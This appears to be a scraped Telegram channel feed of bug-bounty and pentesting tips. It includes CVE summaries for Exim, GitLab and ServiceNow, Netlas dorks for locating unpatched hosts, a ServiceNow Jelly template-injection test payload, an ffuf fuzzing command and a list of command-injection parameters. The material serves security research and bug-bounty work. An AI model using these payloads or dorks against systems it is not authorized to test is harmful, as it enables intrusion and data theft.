🛠️Guide to Active Directory Hacking
📝Active Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.
📰 Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/
🔖#infosec #cybersecurity #hacking #pentesting #security
📝Active Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.
📰 Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/
🔖#infosec #cybersecurity #hacking #pentesting #security
CVE-2024-39929: Bypass of attachment verification in Exim❗
Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.
Search at Netlas.io:
👉 Link: https://nt.ls/gRdtH
👉 Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"
Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.
Search at Netlas.io:
👉 Link: https://nt.ls/gRdtH
👉 Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"
Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
Brut Security pinned «📣 Understanding Bug Bounty Hunting for Newcomers📣 🎁 Bug bounty hunting can seem appealing, but it’s important to know: 🖱 High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»
http://1337/login.do?jvar_page_noscript=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
🔖#bugbounty #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
www.assetnote.io
Chaining Three Bugs to Access All Your ServiceNow Data
Through the course of 3/4 weeks, we were able to find a chain of vulnerabilities that allows full database access and full access to any MID servers configured. This resulted in 3 separate CVE's.
❤1👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
shreyaschavhan on Notion
Year in Bug Bounties - from 0 to $25,700* in 12 months (Stats, Graphs, Learnings, Experiences & Plans!) | Notion
Table of Content:
🔥5👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
🔥5
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating 🔥
The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.
Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef
Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.
Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef
Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
CVE-2024-4879 | Template Injection Vulnerability in ServiceNow | Bug Bounty POC | Brut Security
🚨CVE-2024-4879 & CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches
⚖These vulnerabilities enable unauthenticated remote attackers to execute arbitrary code within the Now Platform,
potentially leading to complete…
⚖These vulnerabilities enable unauthenticated remote attackers to execute arbitrary code within the Now Platform,
potentially leading to complete…
🤡2❤1🔥1
Brut Security
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Brut Security
Parameters where you can try Command Injection. ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} …
Keep Checking Old Posts 🍿
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2